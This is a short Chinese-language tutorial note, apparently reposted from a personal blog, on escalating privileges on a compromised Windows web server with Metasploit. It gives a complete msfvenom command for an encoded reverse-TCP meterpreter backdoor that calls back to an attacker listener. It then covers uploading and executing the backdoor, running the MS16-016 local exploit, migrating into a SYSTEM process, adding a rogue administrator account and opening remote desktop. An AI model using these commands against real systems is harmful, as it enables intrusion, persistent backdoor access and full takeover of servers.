用MSF進行提權


在WEB滲透中當我們拿到webshell了,我們可以試試用MSF(metasploit)來進行提權,在MSF里meterpreter很強大的!

我們先用msfvenom生成一個EXE的木馬后門。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe

然后在到MSF根據剛才配置的木馬后門進行監聽...

然后在把木馬上傳到服務器(受害者)的機器里,必須上傳到可讀可寫的目錄下哦,

比如這里我吧abc.exe上傳到了C:\users\leak\desktop\目錄下,

abc.exe就是我剛才生成的后門。

然后在執行我們的后門,可以看見MSF彈回了一個session 1(會話連接)。

說明我們后門程序成功執行起來了,當然你也可以在webshell執行的,

但必須的有一點執行的權限哦。

getuid //可以看見我們的權限很低的,一般都是user權限的,

但也遇到過某些服務器執行后就直接是system最高權限。像這種我們就直接加用戶啦。

這里我們是user權限,我們要把它提升到system權限。Windows最高權限。

接着我們輸入命令

background     //把你當前的metasploit shell轉為后台執行。

search ms16  // 搜索關鍵字相關的漏洞

.....然后我選擇了MS16-016這個漏洞在進行提權

use exploit/windows/local/ms16_016_webdav //  選擇漏洞

show options  //查看漏洞里邊要設置的參數

可以看見只有一個SESSION參數要設置 

set  SESSION 1 // 設置會剛才我們后門連接的ID號 1

exploit //執行提權...

可以看見成功的吧漏洞利用到了PID為692的進程中...

雖然提權成功了 但你getuid下還是看見的是user權限

 

ps一下查看進程

根據剛才的提示找到PID 692的進程

可以看見確實是system權限

所以我們還要用到migrate 命令 //遷移到一個指定的進程ID。

migrate 692  //

在getuid下可以看見為system權限啦

提權成功了

既然有了system權限 那我們在添加賬號hack

添加為管理員組

用Nmap掃下並沒有開啟遠程登陸3389

run getgui -e  //開啟目標主機3389  貌似這條MSF命令只對2003的系統有效 執行幾次都沒成功 

所以就用cmd命令開了3389端口

提權成功,登錄服務器。。。。

簡單的做個筆記,記性不好。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM